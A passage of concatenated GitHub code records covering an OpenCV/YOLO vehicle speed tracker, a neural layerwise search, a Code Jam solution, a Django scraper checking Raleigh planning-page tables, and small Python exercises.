np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\r\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\r\n maxWidth_l = max(int(widthA), int(widthB))\r\n # compute the height of the new image, which will be the\r\n # maximum distance between the top-right and bottom-right\r\n # y-coordinates or the top-left and bottom-left y-coordinates\r\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\r\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\r\n maxHeight_l = max(int(heightA), int(heightB))\r\n \r\n\r\n \r\n # # The resultant image\r\n # cv2.imwrite('new_masked_image.png', masked_image)\r\n # crop_img = image[tl[0]:tl[0]+h, x:x+w]\r\n # now that we have the dimensions of the new image, construct\r\n # the set of destination points to obtain a \"birds eye view\",\r\n # (i.e. 
top-down view) of the image, again specifying points\r\n # in the top-left, top-right, bottom-right, and bottom-left\r\n # order\r\n dst = np.array([\r\n [0, 0],\r\n [maxWidth_l - 1, 0],\r\n \r\n [0, maxHeight_l - 1],[maxWidth_l - 1, maxHeight_l - 1]], dtype = \"float32\")\r\n # compute the perspective transform matrix and then apply it\r\n warped_M = cv2.getPerspectiveTransform(rect, dst)\r\n \r\n # return the warped image\r\n return warped_M, maxWidth_l, maxHeight_l\r\n# import the necessary packages\r\n\r\ndef order_points(pts):\r\n # initialzie a list of coordinates that will be ordered\r\n # such that the first entry in the list is the top-left,\r\n # the second entry is the top-right, the third is the\r\n # bottom-right, and the fourth is the bottom-left\r\n rect = np.zeros((4, 2), dtype = \"float32\")\r\n # the top-left point will have the smallest sum, whereas\r\n # the bottom-right point will have the largest sum\r\n s = pts.sum(axis = 1)\r\n rect[0] = pts[np.argmin(s)]\r\n rect[2] = pts[np.argmax(s)]\r\n # now, compute the difference between the points, the\r\n # top-right point will have the smallest difference,\r\n # whereas the bottom-left will have the largest difference\r\n diff = np.diff(pts, axis = 1)\r\n rect[1] = pts[np.argmin(diff)]\r\n rect[3] = pts[np.argmax(diff)]\r\n # return the ordered coordinates\r\n return rect\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# [(73, 239), (356, 117), (475, 265), (187, 443)]\r\n# [(511, 214), (629, 203), (968, 593), (1278, 550)]\r\n# [(240, 218), (490, 215), (251, 537), (902, 579)]\r\n# [(218,240), (215,490), ( 537,251), (579,902)]\r\n# [(491, 212), (952, 598)]\r\n# =============================================================================\r\n# =============================================================================\r\n# Define ROIs\r\n# =============================================================================\r\n# right_plane = [(511, 214), (629, 203), (968, 593), (1278, 550)]\r\nright_plane = [(455, 184), (656, 178), (968, 593), (1275, 493)]\r\nleft_plane = [(240, 218), (490, 215), (251, 537), (902, 579)]\r\n\r\n# right_plane1 = [(511, 214), (629, 203), (1278, 550), (968, 593)]\r\nright_plane1 = [(455, 184), (656, 178), (1275, 493), (968, 593)]\r\nleft_plane1 = [(240, 218), (490, 215), (902, 579),(251, 537) ]\r\n\r\n\r\nline = [(491, 212), (952, 598)]\r\n\r\n# =============================================================================\r\n# cars_list: 0 1 2 3 4 5 6 7 8 9 \r\n# trackid start_height start_width end_h start-w time speed\r\n# =============================================================================\r\n\r\n\r\ndef main(_argv):\r\n # Definition of the parameters\r\n cars_list = np.zeros((1000,7))\r\n max_cosine_distance = 0.4\r\n nn_budget = None\r\n nms_max_overlap = 1.0\r\n \r\n # initialize deep sort\r\n model_filename = 'model_data/mars-small128.pb'\r\n encoder = gdet.create_box_encoder(model_filename, batch_size=1)\r\n # calculate cosine distance metric\r\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\r\n # initialize tracker\r\n tracker = Tracker(metric)\r\n\r\n # load configuration for object detector\r\n config = ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n session = InteractiveSession(config=config)\r\n STRIDES, ANCHORS, NUM_CLASS, XYSCALE = utils.load_config(FLAGS)\r\n input_size = FLAGS.size\r\n video_path = FLAGS.video\r\n if FLAGS.mask:\r\n mask = 
cv2.imread(FLAGS.mask_path)//255\r\n\r\n # load tflite model if flag is set\r\n if FLAGS.framework == 'tflite':\r\n interpreter = tf.lite.Interpreter(model_path=FLAGS.weights)\r\n interpreter.allocate_tensors()\r\n input_details = interpreter.get_input_details()\r\n output_details = interpreter.get_output_details()\r\n print(input_details)\r\n print(output_details)\r\n # otherwise load standard tensorflow saved model\r\n else:\r\n saved_model_loaded = tf.saved_model.load(FLAGS.weights, tags=[tag_constants.SERVING])\r\n infer = saved_model_loaded.signatures['serving_default']\r\n\r\n # begin video capture\r\n try:\r\n vid = cv2.VideoCapture(int(video_path))\r\n except:\r\n vid = cv2.VideoCapture(video_path)\r\n fps_a = vid.get(cv2.CAP_PROP_FPS)\r\n\r\n out = None\r\n\r\n # get video ready to save locally if flag is set\r\n if FLAGS.output:\r\n # by default VideoCapture returns float instead of int\r\n width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n fps = int(vid.get(cv2.CAP_PROP_FPS))\r\n codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)\r\n out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))\r\n\r\n frame_num = 0\r\n # while video is running\r\n pts_l = np.array(left_plane, dtype = \"float32\")\r\n pts_r = np.array(right_plane, dtype = \"float32\")\r\n # apply the four point tranform to obtain a \"birds eye view\" of\r\n # the image\r\n \r\n while True:\r\n return_value, frame = vid.read()\r\n warped_Mat_l, maxWidth_l, maxHeight_l = four_point_transform(frame, pts_l)\r\n warped_Mat_r, maxWidth_r, maxHeight_r = four_point_transform(frame, pts_r)\r\n # frame = frame*mask\r\n if return_value:\r\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n image = Image.fromarray(frame)\r\n else:\r\n print('Video has ended or failed, try a different video format!')\r\n break\r\n frame_num +=1\r\n print('Frame #: ', frame_num)\r\n frame_size = frame.shape[:2]\r\n image_data = cv2.resize(frame, (input_size, input_size))\r\n image_data = image_data / 255.\r\n image_data = image_data[np.newaxis, ...].astype(np.float32)\r\n start_time = time.time()\r\n\r\n # run detections on tflite if flag is set\r\n if FLAGS.framework == 'tflite':\r\n interpreter.set_tensor(input_details[0]['index'], image_data)\r\n interpreter.invoke()\r\n pred = [interpreter.get_tensor(output_details[i]['index']) for i in range(len(output_details))]\r\n # run detections using yolov3 if flag is set\r\n if FLAGS.model == 'yolov3' and FLAGS.tiny == True:\r\n boxes, pred_conf = filter_boxes(pred[1], pred[0], score_threshold=0.25,\r\n input_shape=tf.constant([input_size, input_size]))\r\n else:\r\n boxes, pred_conf = filter_boxes(pred[0], pred[1], score_threshold=0.25,\r\n input_shape=tf.constant([input_size, input_size]))\r\n else:\r\n batch_data = tf.constant(image_data)\r\n pred_bbox = infer(batch_data)\r\n for key, value in pred_bbox.items():\r\n boxes = value[:, :, 0:4]\r\n pred_conf = value[:, :, 4:]\r\n\r\n boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(\r\n boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),\r\n scores=tf.reshape(\r\n pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),\r\n max_output_size_per_class=50,\r\n max_total_size=50,\r\n iou_threshold=FLAGS.iou,\r\n score_threshold=FLAGS.score\r\n )\r\n\r\n # convert data to numpy arrays and slice out unused elements\r\n num_objects = valid_detections.numpy()[0]\r\n bboxes = boxes.numpy()[0]\r\n bboxes = bboxes[0:int(num_objects)]\r\n scores = 
scores.numpy()[0]\r\n scores = scores[0:int(num_objects)]\r\n classes = classes.numpy()[0]\r\n classes = classes[0:int(num_objects)]\r\n\r\n # format bounding boxes from normalized ymin, xmin, ymax, xmax ---> xmin, ymin, width, height\r\n original_h, original_w, _ = frame.shape\r\n bboxes = utils.format_boxes(bboxes, original_h, original_w)\r\n\r\n # store all predictions in one parameter for simplicity when calling functions\r\n pred_bbox = [bboxes, scores, classes, num_objects]\r\n\r\n # read in all class names from config\r\n class_names = utils.read_class_names(cfg.YOLO.CLASSES)\r\n\r\n # by default allow all classes in .names file\r\n #allowed_classes = list(class_names.values())\r\n \r\n # custom allowed classes (uncomment line below to customize tracker for only people)\r\n allowed_classes = ['car','bus', 'truck']\r\n\r\n # loop through objects and use class index to get class name, allow only classes in allowed_classes list\r\n names = []\r\n deleted_indx = []\r\n for i in range(num_objects):\r\n class_indx = int(classes[i])\r\n class_name = class_names[class_indx]\r\n if class_name not in allowed_classes:\r\n deleted_indx.append(i)\r\n else:\r\n names.append(class_name)\r\n names = np.array(names)\r\n count = len(names)\r\n if FLAGS.count:\r\n cv2.putText(frame, \"Objects being tracked: {}\".format(count), (5, 35), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (0, 255, 0), 2)\r\n print(\"Objects being tracked: {}\".format(count))\r\n # delete detections that are not in allowed_classes\r\n bboxes = np.delete(bboxes, deleted_indx, axis=0)\r\n scores = np.delete(scores, deleted_indx, axis=0)\r\n\r\n # encode yolo detections and feed to tracker\r\n features = encoder(frame, bboxes)\r\n detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(bboxes, scores, names, features)]\r\n\r\n #initialize color map\r\n cmap = plt.get_cmap('tab20b')\r\n colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]\r\n\r\n # run non-maxima supression\r\n boxs = np.array([d.tlwh for d in detections])\r\n scores = np.array([d.confidence for d in detections])\r\n classes = np.array([d.class_name for d in detections])\r\n indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)\r\n detections = [detections[i] for i in indices] \r\n\r\n # Call the tracker\r\n tracker.predict()\r\n tracker.update(detections)\r\n \r\n # update tracks\r\n for track in tracker.tracks:\r\n if not track.is_confirmed() or track.time_since_update > 1:\r\n continue \r\n bbox = track.to_tlbr()\r\n class_name = track.get_class()\r\n \r\n # draw bbox on screen\r\n color = colors[int(track.track_id) % len(colors)]\r\n color = [i * 255 for i in color]\r\n cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)\r\n # cv2.rectangle(frame, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)\r\n # Make empty black image\r\n image_point = np.zeros(frame.shape,np.uint8)\r\n xx = (int(bbox[0]) + int(bbox[2]))//2\r\n yy = (int(bbox[1]) + int(bbox[3]))//2\r\n# =============================================================================\r\n# # Find the proper RoI\r\n# =============================================================================\r\n image_point[yy,xx]=[0,0,255]\r\n contours_r = [np.array(right_plane1, dtype=np.int32) ]\r\n contours_l = [np.array(left_plane1, dtype=np.int32) ]\r\n \r\n \r\n Inside_r = cv2.pointPolygonTest(contours_r[0], (xx,yy), False)\r\n Inside_l = 
cv2.pointPolygonTest(contours_l[0], (xx,yy), False)\r\n \r\n# =============================================================================\r\n# # Correct the perspective distortion\r\n# =============================================================================\r\n if Inside_r>0:\r\n warped_ = cv2.warpPerspective(image_point, warped_Mat_r,(maxWidth_r, maxHeight_r))\r\n maxWidth, maxHeight = (maxWidth_r, maxHeight_r)\r\n cars_list, frame = speed_estimation_module(frame,warped_,cars_list, track,bbox,maxWidth, maxHeight)\r\n if Inside_l>0:\r\n warped_ = cv2.warpPerspective(image_point, warped_Mat_l,(maxWidth_l, maxHeight_l))\r\n maxWidth, maxHeight = (maxWidth_l, maxHeight_l)\r\n# =============================================================================\r\n# # Calculate the speed\r\n# =============================================================================\r\n cars_list, frame = speed_estimation_module(frame,warped_,cars_list, track,bbox,maxWidth, maxHeight)\r\n\r\n # if enable info flag then print details about each track\r\n if FLAGS.info:\r\n print(\"Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}\".format(str(track.track_id), class_name, (int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3]))))\r\n\r\n # calculate frames per second of running detections\r\n fps = 1.0 / (time.time() - start_time)\r\n print(\"FPS: %.2f\" % fps)\r\n result = np.asarray(frame)\r\n result = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\r\n\r\n if not FLAGS.dont_show:\r\n cv2.imshow(\"Output Video\", result)\r\n \r\n # if output flag is set, save video file\r\n if FLAGS.output:\r\n out.write(result)\r\n if cv2.waitKey(1) & 0xFF == ord('q'): break\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n app.run(main)\r\n except SystemExit:\r\n pass\r\n","repo_name":"samirgholipour/speed_estimation","sub_path":"object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":17091,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"24384404985","text":"import numpy as np\nimport random\nimport sys\nsys.path.insert(0,'/homes/nj2217/FINAL_PROJECT/MAIN')\n# sys.path.insert(0,'/d/PROJECT/FINAL_PROJECT/MAIN')\n\nfrom HELPER_FUNCTION import *\nfrom TRAIN_MODEL_CIFAR10 import *\nfrom TRAIN_MODEL_MNIST import *\n\nMAX_ACTION = 16\nMAX_STATE = 4\nLAYER_ACTION = ['c_1','c_2','c_3','c_4','c_5','c_6','c_7','c_8','c_9','c_10','c_11',\\\n 'c_12','m_1','m_2','m_3','s']\n\nMAX_INDEX_MODEL_ARRAY = 1 + MAX_STATE + 2\nINDEX_MODEL = 0\nINDEX_ACCURACY = -2\n\ndef create_empty_array():\n ###########################################################################\n # FUNCTION DESCRIPTION: create empty array equal to state total state space\n # with each row consists of model_name,topologies,\n # accuracy and loss with '-'\n ###########################################################################\n\n final_array = []\n for _ in range(MAX_ACTION*MAX_STATE):\n temp_array = ['-']*MAX_INDEX_MODEL_ARRAY\n final_array.append(temp_array)\n return final_array\n\n\ndef init_layer_action(final_array,index_hill_level):\n ###########################################################################\n # FUNCTION DESCRIPTION: initialize array with each possible action\n ###########################################################################\n\n for index in range(MAX_ACTION):\n final_array[index+index_hill_level*MAX_ACTION][index_hill_level+1] = LAYER_ACTION[index]\n return final_array\n\ndef use_best_layer(final_array,best_layer,index_hill_level):\n ###########################################################################\n # FUNCTION DESCRIPTION: assign the layer with highest accuracy for next training\n ###########################################################################\n\n start_index = (1+index_hill_level)*MAX_ACTION\n final_index = MAX_STATE*MAX_ACTION\n for index in range(start_index,final_index):\n final_array[index][index_hill_level+1] = best_layer\n return final_array\n\ndef layerwise_search(DATASET,SAVE_FILE):\n ###########################################################################\n # FUNCTION DESCRIPTION: do layerwise search algorithm to find the topology that gives\n # highest validation accuracy\n ###########################################################################\n\n model_num = 0\n final_array = create_empty_array()\n\n for index_hill_level in range(MAX_STATE):\n final_array = init_layer_action(final_array,index_hill_level)\n accuracy_array = []\n\n for index_layer_in_hill in range(MAX_ACTION):\n\n for index_model_array in range(MAX_INDEX_MODEL_ARRAY):\n current_model_array = final_array[index_layer_in_hill+index_hill_level*MAX_ACTION]\n current_model_array[INDEX_MODEL] = 'model_'+str(model_num)\n\n if DATASET == 'cifar10':\n # accuracy = random.uniform(0, 1)\n accuracy = train_model_cifar10(current_model_array, DATASET)\n elif DATASET == 'mnist':\n # accuracy = random.uniform(0, 1)\n accuracy = train_model_mnist(current_model_array,DATASET)\n\n accuracy_array.append(accuracy)\n current_model_array[INDEX_ACCURACY] = accuracy\n\n eval_result = ['Unknown',accuracy]\n model_num += 1\n\n save_trained_model_in_csv(SAVE_FILE,current_model_array,eval_result)\n\n max_accuracy = max(accuracy_array)\n index_best_layer = accuracy_array.index(max_accuracy)\n best_layer = LAYER_ACTION[index_best_layer]\n\n if index_hill_level != MAX_STATE-1:\n final_array = use_best_layer(final_array, best_layer,index_hill_level)\n\n print(final_array)\n\ndef main():\n DATASET = 'cifar10'\n SAVE_FILE = 'hc_cifar10.csv'\n 
layerwise_search(DATASET,SAVE_FILE)\n\nif __name__ == '__main__':\n main()\n","repo_name":"thenatzzz/Qsearch_MSc_Final_project","sub_path":"LAYERWISE_SEARCH/LAYERWISE_algo.py","file_name":"LAYERWISE_algo.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23585558501","text":"# Written by Nikolai Artemiev\n\nimport collections\nimport functools\nimport itertools\nimport math\nimport multiprocessing\nimport os\nimport resource\nimport sys\npi = math.pi\n\ndef solve(N, K, P):\n M = 0\n for b in range(N):\n AB = P[b][0] ** 2 * pi + (P[b][1] * P[b][0] * pi * 2)\n PA = [(p[1] * p[0] * pi * 2) for p in (P[:b] + P[b + 1:])]\n PA = sorted(PA, key = lambda x: -x)\n AB += sum(PA[:K - 1])\n M = max(M, AB)\n return M\n\n\n\n\ndef read(F):\n N, K = [int(num) for num in F.readline().split()]\n P = [[int(num) for num in F.readline().split()] for n in range(N)]\n return N, K, P\n\nif __name__ == \"__main__\":\n # Resize stack to useful size\n recursion_limit = 100000\n resource.setrlimit(resource.RLIMIT_STACK, [resource.RLIM_INFINITY, resource.RLIM_INFINITY])\n sys.setrecursionlimit(recursion_limit)\n\n if \"--input\" in sys.argv and len(sys.argv) >= sys.argv.index(\"--input\"):\n # Use input file from command line args\n input_file = sys.argv[sys.argv.index(\"--input\") + 1]\n else:\n # Find the most recently downloaded input file\n input_files = [name for name in os.listdir(\".\") if name.endswith(\".in\")]\n input_file = max(input_files, key = os.path.getmtime)\n\n # Read cases\n with open(input_file) as F:\n T = int(F.readline())\n cases = [read(F) for case in range(T)]\n\n # Solve\n def expand_solve(args): return solve(*args)\n\n solutions = multiprocessing.Pool().map(expand_solve, cases)\n\n # Print\n for case, solution in enumerate(solutions):\n print(\"Case #{}: {}\".format(case + 1, solution))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/230.py","file_name":"230.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17275644331","text":"\"\"\"This command is used to query the APIs, compare the results with the DB and make appropriate changes.\"\"\"\nimport logging\nfrom bs4 import BeautifulSoup\nimport requests\nimport sys\nfrom datetime import datetime\nfrom prettytable import PrettyTable\n\nfrom django.core.management.base import BaseCommand\nfrom develop.models import *\nfrom datetime import datetime\n\nfrom .emails import *\nlogger = logging.getLogger(\"django\")\n\n\ndef get_page_content(page_link):\n n = datetime.now()\n\n try:\n page_response = requests.get(page_link, timeout=10)\n except requests.exceptions.RequestException as e:\n print(n.strftime(\"%H:%M %m-%d-%y\") + \": Connection problem to \" + page_link)\n sys.exit(1)\n\n if page_response.status_code == 200:\n return BeautifulSoup(page_response.content, \"html.parser\")\n else:\n return None\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n sr_page_link = \"https://raleighnc.gov/services/zoning-planning-and-development/site-review-cases\"\n zon_page_link = \"https://raleighnc.gov/SupportPages/zoning-cases\"\n tc_page_link = \"https://raleighnc.gov/SupportPages/text-change-cases\"\n neighbor_page_link = \"https://raleighnc.gov/planning/neighborhood-meetings\"\n message = \"\"\n\n # scrape the target websites and verify that the table headers are what we expect.\n\n # Site Review tables\n sr_expected = [\"Case Number\", \"Project Name/Location/Description\", \"CAC\", \"Status*\", \"Contact\"]\n sr_expected_2022 = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n sr_tables = get_page_content(sr_page_link).find_all(\"table\")\n for sr_table in sr_tables:\n x = PrettyTable()\n sr_actual = []\n table_thead = sr_table.find(\"thead\")\n thead_row = table_thead.find_all(\"th\")\n if not thead_row:\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n sr_actual.append(header.get_text().strip())\n\n if sr_actual == sr_expected or sr_actual == sr_expected_2022:\n pass\n else:\n message = \"SR Table has changed.\\n\"\n try:\n x.add_row(sr_actual)\n x.add_row(sr_expected)\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check site reviews.\"\n\n # AAD tables\n # aad_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n # aad_tables = get_page_content(aad_page_link).find_all(\"table\")\n # for aad_table in aad_tables:\n # x = PrettyTable()\n # aad_actual = []\n # table_thead = aad_table.find(\"thead\")\n # thead_row = table_thead.find_all(\"td\")\n #\n # for header in thead_row:\n # aad_actual.append(header.get_text().strip())\n #\n # if aad_actual == aad_expected:\n # pass\n # else:\n # message = \"AAD Table has changed.\\n\"\n # try:\n # x.add_row(aad_actual)\n # x.add_row(aad_expected)\n # message += str(x)\n # except Exception as e:\n # print(e)\n # message += \"Problem with table. 
Please check AADs.\"\n\n # TCC tables\n tcc_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Description\", \"Status\", \"Contact\"]\n tcc_tables = get_page_content(tc_page_link).find_all(\"table\")\n for tcc_table in tcc_tables[:1]:\n x = PrettyTable()\n tcc_actual = []\n table_thead = tcc_table.find(\"thead\")\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n tcc_actual.append(header.get_text().strip())\n\n if len(tcc_actual) > 0:\n if tcc_actual == tcc_expected:\n pass\n else:\n message = \"TCC Table has changed.\\n\"\n try:\n x.add_row(tcc_actual)\n x.add_row(tcc_expected)\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check TCCs.\"\n\n # Zoning tables\n zon_expected = [\"Case Number, Application & Status\", \"Location & Map Link\", \"Council District\", \"Staff Contact\"]\n zon_tables = get_page_content(zon_page_link).find_all(\"table\")\n # for zon_table in zon_tables:\n x = PrettyTable()\n zon_actual = []\n table_thead = zon_tables[0].find(\"thead\")\n thead_row = table_thead.find_all(\"th\")\n if not thead_row:\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n zon_actual.append(header.get_text().strip().replace(\"\\n\", \"\"))\n\n if zon_actual == zon_expected:\n pass\n else:\n try:\n x.add_row(zon_actual)\n x.add_row(zon_expected)\n message = \"Zon Table has changed.\\n\"\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check zoning.\"\n\n # Neighborhood meetings tables\n # neighbor_expected = [\"Meeting Details\", \"Rezoning Site Address\", \"Applicant/Link to Meeting Information\",\n # \"Council District\", \"Staff Contact\"]\n neighbor_expected = ['Date & Time', 'Meeting Location', 'Site Location & Map', 'Request',\n 'Council District', 'Applicant Contact', 'Staff Contact']\n neighbor_tables = get_page_content(neighbor_page_link).find_all(\"table\")\n for count, neighbor_table in enumerate(neighbor_tables):\n # June 2, 22: It's a table inside a table. So skip the first one. 
:(\n if count == 0:\n continue\n\n x = PrettyTable()\n neighbor_actual = []\n # thead_row = neighbor_table.find_all(\"tr\")[0]\n thead_row = neighbor_table.find(\"thead\")\n thead_row_items = thead_row.find_all(\"th\")\n\n for header in thead_row_items:\n neighbor_actual.append(header.get_text().strip().replace(\"\\n\", \"\"))\n\n if neighbor_actual == neighbor_expected:\n pass\n else:\n try:\n print(neighbor_actual)\n # print(neighbor_expected)\n x.add_row(neighbor_actual)\n x.add_row(neighbor_expected)\n message = \"Neighborhood Table has changed.\\n\"\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with neighborhood tables, please check.\"\n\n # DA case tables\n # da_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n # da_tables = get_page_content(da_page_link).find_all(\"table\")\n # for da_table in da_tables:\n # x = PrettyTable()\n # da_actual = []\n # table_thead = da_table.find(\"thead\")\n # thead_row = table_thead.find_all(\"td\")\n #\n # for header in thead_row:\n # da_actual.append(header.get_text().strip())\n #\n # if da_actual == da_expected:\n # pass\n # else:\n # try:\n # x.add_row(da_actual)\n # x.add_row(da_expected)\n # message = \"DA Case Table has changed.\\n\"\n # message += str(x)\n # except Exception as e:\n # print(e)\n # message += \"Problem with da case tables, please check.\"\n\n if message:\n send_email_notice(message, email_admins())\n","repo_name":"dtraleigh/dtraleigh","sub_path":"develop/management/commands/COR_table_header_check.py","file_name":"COR_table_header_check.py","file_ext":"py","file_size_in_byte":8112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31827236996","text":"\"\"\"\n\n53. Maximum Subarray\nEasy\n\n14395\n\n679\n\nAdd to List\n\nShare\nGiven an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nA subarray is a contiguous part of an array.\n\n \n\nExample 1:\n\nInput: nums = [-2,1,-3,4,-1,2,1,-5,4]\nOutput: 6\nExplanation: [4,-1,2,1] has the largest sum = 6.\nExample 2:\n\nInput: nums = [1]\nOutput: 1\nExample 3:\n\nInput: nums = [5,4,-1,7,8]\nOutput: 23\n \n\nConstraints:\n\n1 <= nums.length <= 3 * 104\n-105 <= nums[i] <= 105\n \n\nFollow up: If you have figured out the O(n) solution, try coding another solution using the divide and conquer approach, which is more subtle.\n\n\"\"\"\n\n\nclass Solution:\n def maxSubArray(self, nums: list[int]) -> int:\n ans = -float('inf')\n a = 0\n for i in nums:\n a = max(i, a+i)\n ans = max(ans, a)\n return ans\n","repo_name":"UdayKiranPadhy/DS-And-Algo","sub_path":"Data Structures/Arrays/4-Maximum Subarray.py","file_name":"4-Maximum Subarray.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"17255130327","text":"# -*- coding: utf-8 -*-\n\n#! python3\n\nimport openpyxl, sys\n\nfrom openpyxl.styles import Font\nfrom openpyxl.styles import Color, Fill\nfrom openpyxl.cell import Cell\n\ntry:\n\tfrom openpyxl.cell import column_index_from_string,get_column_letter\nexcept ImportError:\n\tfrom openpyxl.utils import column_index_from_string,get_column_letter\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=\" %(asctime)s - %(levelname)s - %(message)s\")\nlogging.disable(logging.CRITICAL)\n\nwb = openpyxl.Workbook() # create the workbook\nsheet = wb.active # switch to the active sheet, there should only be one\nsheet.title = \"Multi Table\" # rename the sheet\n\n# parse the command line\n\nmulti_number_cmdline = sys.argv[1] # should be the first argument in the command line i.e. the number, if you use 0 you get the program name\n\n# multi_number_cmdline = \"3\" # set for purposes of testing, disable at end of development\n\nlogging.debug('The command line value entered for the max multi-table value is: %s' % (multi_number_cmdline))\n\n# create the font style for the headers\n\nboldHeaderFont1 = Font(bold=True) # font object\n\n# create the frozen header row\n\nfor x in range(2,int(multi_number_cmdline) + 2): # since you started the loop at 2, then you need to shift the ending value by 2\n\tcolumn_letter = get_column_letter(x)\n\t# the row stays the same i.e. 1\n\tlogging.debug('Frozen row header - The current header column letter is: %s' % (column_letter))\n\tsheet[column_letter + '1'] = x - 1 # set that cell to the current x value in the loop\n\tlogging.debug('Frozen row header - The current header column letter and row number changed is: %s' % (column_letter + '1'))\n\t# alter the font to bold\n\tsheet[column_letter + '1'].font = boldHeaderFont1\n\tlogging.debug('The font for %s has been altered.' % (column_letter + '1'))\n\n# create the frozen header column\n\nfor x in range(2,int(multi_number_cmdline) + 2):\n\tsheet[\"A\" + str(x)] = x - 1\n\tlogging.debug('Frozen column header - The current header column letter and row number changed is: %s' % (\"A\" + str(x)))\n\t# alter the font to bold\n\tsheet[\"A\" + str(x)].font = boldHeaderFont1\n\tlogging.debug('The font for %s has been altered.' 
% (\"A\" + str(x)))\n\n# freeze the panes\n\nsheet.freeze_panes = 'B2' # row 1 and columns A\nlogging.debug('Panes frozen creating header row and header column.')\n\n# begin filling in the multiplication values\n\nfor colValue in range(2,int(multi_number_cmdline) + 2):\n\tcolumn_letter = get_column_letter(colValue)\n\tlogging.debug('Frozen row header - The current header column letter is: %s' % (column_letter))\n\tlogging.debug('Frozen row header - The current header column label is: %i' % (colValue - 1))\n\n\t# now to fill each value row by row within the column\n\tfor rowValue in range(2,int(multi_number_cmdline) + 2):\n\t\t# logging.debug('The current column value is: %i' % (colValue - 1))\n\t\t# logging.debug('The current row value is: %i' % (rowValue - 1))\n\t\tsheet[column_letter + str(rowValue)] = (colValue - 1) * (rowValue - 1)\n\t\tlogging.debug('The multiplication value set is: %i' % ((colValue - 1) * (rowValue - 1)))\n\n# save the final sheet\n\nwb.save('multiplicationTable.xlsx')\nlogging.debug('Spreadsheet file saved.')\n","repo_name":"sunnylam13/multiplicationTable_031918_1","sub_path":"multiplicationTable/multiplicationTable.py","file_name":"multiplicationTable.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27155914745","text":"from audioop import mul\nimport names\nimport random\n\nfrom verbs_related import pronom\n#import verbs_related\n#print(names.get_first_name())\n\n#print(random.choice(pronoms))\n#print(multiple)\n\nclass Pronom:\n def __init__(self):\n multiple=names.get_first_name()+\" et \"+names.get_first_name()\n pronoms=[\"tu\",\"il\",\"elle\",names.get_first_name(),\"nous\",\"vous\",\"elles\",\"ils\",multiple]\n self.pronom=random.choice(len(pronoms))\n def return_type_self(self):\n if self.pronom==0:\n return 2\n elif self.pronom==1 or self.pronom==2 or self.pronom==3:\n return 3\n elif self.pronom==4:\n return 4\n elif self.pronom==5:\n return 5\n elif self.pronom==6 or self.pronom==7 or self.pronom==8:\n return 6\n\n def return_list(self):\n id_pronom = Pronom.return_type_self()\n if id_pronom == 2:\n return [\"tu\",\"tu\",id_pronom]\n elif id_pronom == 3:\n return [\"il\",self.pronom,id_pronom]\n elif id_pronom==\"4\":\n return [\"nous\",\"nous\",id_pronom]\n elif id_pronom==5:\n return [\"vous\",\"vous\",id_pronom]\n elif id_pronom==6:\n return [\"ils\",self.pronom,id_pronom]\n\nwith 